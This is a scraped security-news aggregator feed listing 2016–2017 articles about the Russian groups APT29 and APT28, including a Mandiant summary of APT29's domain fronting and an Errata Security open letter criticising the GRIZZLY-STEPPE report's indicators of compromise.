Mandiant has observed Russian nation-state attackers APT29 employing domain fronting techniques for stealthy backdoor access to victim environments for at least two years. There has been considerable discussion about domain fronting following the release of a paper detailing these techniques. Domain fronting provides outbound network connections that are indistinguishable from legitimate requests for popular websites. APT29 has used The Onion Router (TOR) and the TOR domain fronting plugin meek to create a hidden, encrypted network tunnel that appeared to connect to Google services over TLS]]> 2017-03-27T07:00:00+00:00 https://www.mandiant.com/resources/blog/apt29-domain-frontin www.secnews.physaphae.fr/article.php?IdArticle=8377787 False None APT 29,APT 29 4.0000000000000000 SecurityWeek - Security News 2017-02-13T16:52:34+00:00 http://feedproxy.google.com/~r/Securityweek/~3/ZMjfdMqZfPk/dhs-uses-cyber-kill-chain-analyze-russia-linked-election-hacks www.secnews.physaphae.fr/article.php?IdArticle=313106 False None APT 29,APT 28 None The State of Security - Magazine Américain Read More ]]> 2017-01-11T04:00:46+00:00 https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/10-questions-that-need-to-be-asked-about-every-cybersecurity-story/ www.secnews.physaphae.fr/article.php?IdArticle=289173 False None APT 29,APT 28 None Dark Reading - Informationweek Branch 2017-01-04T17:40:00+00:00 http://www.darkreading.com/threat-intelligence/dhs-fbi-report-shows-russian-attributions-a-bear/d/d-id/1327828?_mc=RSS_DR_EDT www.secnews.physaphae.fr/article.php?IdArticle=285828 False None APT 29,APT 28 None Errata Security - Errata Security Instead of communicating with the America people, you worked through your typical system of propaganda, such as stories in the New York Times quoting unnamed "senior government officials". We don't want "unnamed" officials -- we want named officials (namely you) who we can pin down and question. When you work through this system of official leaks, we believe you have something to hide, that the evidence won't stand on its own.We still don't believe the CIA's conclusions because we don't know, precisely, what those conclusions are. Are they derived purely from companies like FireEye and CloudStrike based on digital forensics? Or do you have spies in Russian hacker communities that give better information? This is such an important issue that it's worth degrading sources of information in order to tell us, the American public, the truth.You had the DHS and US-CERT issue the "GRIZZLY-STEPPE" report "attributing those compromises to Russian malicious cyber activity". It does nothing of the sort. It's full of garbage. It contains signatures of viruses that are publicly available, used by hackers around the world, not just Russia. It contains a long list of IP addresses from perfectly normal services, like Tor, Google, Dropbox, Yahoo, and so forth.Yes, hackers use Yahoo for phishing and malvertising. It doesn't mean every access of Yahoo is an "Indicator of Compromise".For example, I checked my web browser [chrome://net-internals/#dns] and found that last year on November 20th, it accessed two IP addresses that are on the Grizzley-Steppe list:No, this doesn't mean I've been hacked. It means I just had a normal interaction with Yahoo. It means the Grizzley-Steppe IoCs are garbage.If your intent was to show technical information to experts to confirm Russia's involvement, you've done the precise opposite. Grizzley-Steppe proves such enormous incompetence that we doubt all the technical details you might have. I mean, it's possible that you classified the important details and de-classified the junk, but even then, that junk isn't worth publishing. There's no excuse for those Yahoo addresses to be in there, or the numerous other problems.Among the consequences is that Washington Post story claiming Russians hacked into the Vermont power grid. What really happened is that somebody just checked their Yahoo email, thereby accessing one of the same IP addresses I did. How they get from the facts (one person accessed Yahoo email) to the story (Russians hacked power grid) is your responsibility. This misinformation is your fault.You announced sanctions for the Russian hacking [*]. At the same time, you announced sanctions for Russian harassment of diplomati]]> 2017-01-03T21:33:01+00:00 http://blog.erratasec.com/2017/01/dear-obama-from-infosec.html www.secnews.physaphae.fr/article.php?IdArticle=284726 False None Yahoo,APT 29,APT 28 None SecurityWeek - Security News Joint Analysis Report (JAR) published by the Department of Homeland Security (DHS) and Federal Bureau of Investigation (FBI) to detail tools used by Russian hackers in cyber attacks against the United States election didn't deliver on its promise, security experts argue. ]]> 2017-01-02T16:29:22+00:00 http://feedproxy.google.com/~r/Securityweek/~3/NJpEfw0rqRs/us-govs-grizzly-steppe-report-fails-achieve-purpose-experts www.secnews.physaphae.fr/article.php?IdArticle=283705 False None APT 29,APT 28 None